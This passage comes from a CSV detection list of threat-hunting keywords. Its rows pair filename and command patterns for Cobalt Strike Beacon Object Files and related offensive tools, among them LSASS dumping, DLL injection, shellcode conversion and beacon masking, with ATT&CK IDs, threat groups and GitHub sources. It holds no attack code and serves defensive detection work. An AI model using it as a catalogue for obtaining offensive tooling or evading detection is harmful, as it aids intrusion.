to return the process Environment strings without touching any DLL's.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/whereami,1,0,N/A,10,10,152,27,2023-03-13T15:56:38Z,2021-08-19T22:32:34Z -*bof*/CredEnum/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*BOF.NET.git*,offensive_tool_keyword,BOF.NET,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,0,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*BOF.NET-main*,offensive_tool_keyword,BOF.NET,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,0,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*BOF/*procdump/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*bof_allocator*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bof_helper.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) Creation Helper,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dtmsecurity/bof_helper,1,1,N/A,10,10,198,44,2022-05-03T18:56:14Z,2020-07-01T14:50:29Z -*bof_net_user.c*,offensive_tool_keyword,cobaltstrike,Use windows api to add users which can be used when net is unavailable,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/lengjibo/NetUser,1,1,N/A,10,10,410,90,2021-09-29T14:22:09Z,2020-01-09T08:33:27Z -*bof_net_user.o*,offensive_tool_keyword,cobaltstrike,Use windows api to add users which can be used when net is unavailable,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/lengjibo/NetUser,1,1,N/A,10,10,410,90,2021-09-29T14:22:09Z,2020-01-09T08:33:27Z -*bof_pack.py *,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*bof_reuse_memory*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*BOF2shellcode*,offensive_tool_keyword,cobaltstrike,POC tool to convert CobaltStrike BOF files to raw shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FalconForceTeam/BOF2shellcode,1,1,N/A,10,10,145,25,2021-11-05T18:37:53Z,2021-11-05T14:29:57Z -*bof2shellcode.py*,offensive_tool_keyword,cobaltstrike,POC tool to convert CobaltStrike BOF files to raw shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FalconForceTeam/BOF2shellcode,1,1,N/A,10,10,145,25,2021-11-05T18:37:53Z,2021-11-05T14:29:57Z -*BOF-DLL-Inject*,offensive_tool_keyword,cobaltstrike,Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tomcarver16/BOF-DLL-Inject,1,1,N/A,10,10,140,22,2020-09-03T23:24:31Z,2020-09-03T23:04:30Z -*bofentry::bof_entry*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/wumb0/rust_bof,1,1,N/A,10,10,189,22,2023-03-03T22:53:02Z,2022-02-28T23:46:00Z -*BOF-ForeignLsass*,offensive_tool_keyword,cobaltstrike,LSASS Dumping With Foreign Handles,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/alfarom256/BOF-ForeignLsass,1,1,N/A,10,10,96,25,2021-08-23T16:57:08Z,2021-08-21T00:19:29Z -*bofhound --*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*bofhound -i *,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*bofhound -o *,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*bofhound-main*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*BOF-IShellWindows-DCOM.*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*BofLdapSignCheck*,offensive_tool_keyword,cobaltstrike,Beacon Object File & C# project to check LDAP signing,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cube0x0/LdapSignCheck,1,1,N/A,10,10,148,22,2022-10-25T13:36:43Z,2022-02-24T20:25:31Z -*bofloader.bin*,offensive_tool_keyword,cobaltstrike,POC tool to convert CobaltStrike BOF files to raw shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FalconForceTeam/BOF2shellcode,1,1,N/A,10,10,145,25,2021-11-05T18:37:53Z,2021-11-05T14:29:57Z -*BOFMask-main*,offensive_tool_keyword,BOFMask,BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF),T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/passthehashbrowns/BOFMask,1,1,N/A,10,1,94,24,2023-06-28T14:35:32Z,2023-06-27T21:19:22Z -*bofnet*SeriousSam.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*BOFNET.Bofs*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 